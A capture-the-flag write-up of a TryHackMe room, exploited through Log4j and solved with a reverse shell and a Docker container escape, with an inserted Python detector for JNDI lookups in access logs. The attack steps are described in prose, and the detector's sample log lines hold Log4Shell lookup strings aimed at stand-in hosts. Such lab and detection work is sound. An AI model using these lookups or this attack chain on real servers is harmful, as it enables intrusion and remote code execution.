Welcome to the writeup for this medium-level room on www.tryhackme.com
First off, let’s start the machine up and go make a cup of Java, as the room info states this could take around 7 minutes to fully boot up.
Enumeration:
I’m going to start with an nmap scan of the given IP:
As can be seen, we have the usual combo of ports 80 & 22 open.
Let’s visit the website:
There’s not much here; even checking the page source didn’t reveal anything!
Let’s try a gobuster scan to see what we can dig up!
Awesome, we got 2 hits; let’s go and check them out.
One dir just gives us an error page…
The other dir we found indicates we need to dig a little deeper, so off we go back to gobuster to see if we can dig anything else up.
We get another hit!
Let’s go and check that page out.
Navigating to that page gives us a hint that something here may be vulnerable, but what could it be?
Investigating the room a little further, it seems this web server could be vulnerable to a Log4j attack, so let’s launch Burp Suite and investigate a little further.
So with the request captured in Burp I’ll send it to Repeater (CTRL+R) and try a payload in the request to see what happens.
Let’s fire up a listener:
We got a hit on our listener, so it looks like it’s definitely vulnerable to a Log4j attack.
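As an added example (not part of the original writeup), here is a small Python detector a defender can run over web-server access logs to spot the kind of probe described above: it unwraps Log4j text-transform lookups and flags any request carrying a ${jndi:...} lookup, plus any request with suspicious nested lookups it could not unwrap. The log lines, host names and field layout are constructed for the example; the .invalid host names resolve nowhere.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (not from the room or the original post).
# The lookup strings use the reserved ".invalid" TLD so they resolve nowhere.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2022:10:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2022:10:00:07 +0000] "GET /api HTTP/1.1" 200 17 "-" "${jndi:ldap://probe.invalid:1389/a}"',
    '10.0.0.9 - - [01/Jan/2022:10:00:09 +0000] "GET /api?x=1 HTTP/1.1" 200 17 "-" "curl/7.68.0"',
    '10.0.0.9 - - [01/Jan/2022:10:00:12 +0000] "GET /api HTTP/1.1" 200 17 "-" "${${lower:j}ndi:rmi://probe.invalid/x}"',
    '10.0.0.7 - - [01/Jan/2022:10:00:15 +0000] "GET /price?amt=${order.total} HTTP/1.1" 200 40 "-" "ok"',
]

# Log4j 2 lookups that only transform text; nesting them is a common way of
# hiding the literal string "jndi" from simple keyword matching.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")  # ${name:-fallback} -> fallback
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def normalize_lookups(text: str) -> str:
    """Resolve nested text-transform lookups until nothing changes."""
    previous = None
    while previous != text:
        previous = text
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


def scan_line(line: str) -> Optional[Dict[str, Optional[str]]]:
    """Return a finding for one log line, or None if it looks benign."""
    normalized = normalize_lookups(line)
    match = _JNDI.search(normalized)
    if match:
        return {"rule": "jndi-lookup", "scheme": match.group(1).lower(), "line": line}
    # Two or more "${" in one request is unusual for real traffic and typical
    # of obfuscated lookups the normalizer did not know how to unwrap.
    if line.count("${") >= 2:
        return {"rule": "nested-lookup", "scheme": None, "line": line}
    return None


def scan_log(lines: List[str]) -> List[Dict[str, Optional[str]]]:
    """Scan a batch of log lines and keep only the findings."""
    return [finding for finding in map(scan_line, lines) if finding is not None]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG_LINES):
        print(f"{finding['rule']:>14} scheme={finding['scheme']}: {finding['line']}")
```

Run against the constructed lines it reports the two probe requests (schemes ldap and rmi) and stays quiet on the line whose single ${order.total} is ordinary template text, which is the false-positive case a plain grep for "${" would trip over. In a real deployment the same check belongs on every logged field an attacker controls (User-Agent, X-Forwarded-For, query strings), not just the one shown here.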
Now let’s try and get a shell and get that first flag in the bag.
After some Google-fu I eventually found an exploit I could work with, so without further ado, let’s get to it!
This is the link to the site I visited to get an understanding of how I could get a shell on the box: https://github.com/christophetd/log4shell-vulnerable-app/blob/main/README.md
Let’s get everything prepared. First of all, I’m going to start an LDAP server:
Then I’ll set up a listener for my shell:
Now, looking at how we exploit this vulnerability, it seems that we need to Base64-encode our reverse shell. I use this site to generate my payloads; you can obviously use your preferred method.
Now with my payload prepared let’s go back to Burp and get that shell!!
Boom! We have shell!
Now we need to hunt around for that first flag. The room hint indicates we need to use -a when listing the directories; if you look up what this means in the ls help, it gives us this definition: "-a, --all: do not ignore entries starting with ."
After doing some digging around I located the first flag.
Cool, with that in the bag, let’s move on to trying to get root!
After uploading linpeas, it confirmed what I already thought: that we are in a Docker container.
And that we have ownership of some interesting SUID files.
Now we have this knowledge, we can go on to escape the container and get the root flag!
Looking in a certain directory we can see that we have read/write permissions to certain virtual disks, allowing us to escalate our privileges and escape the container to grab the final flag.
We are now free of the container!
Just when you think you have the root flag, the room creator decides to play a little joke on us!
So, let’s get hunting for the final flag.
After a little poke around we get the final flag and the box is pwned!
This was an awesome box and I thoroughly enjoyed it; many thanks to the creator SilverStr.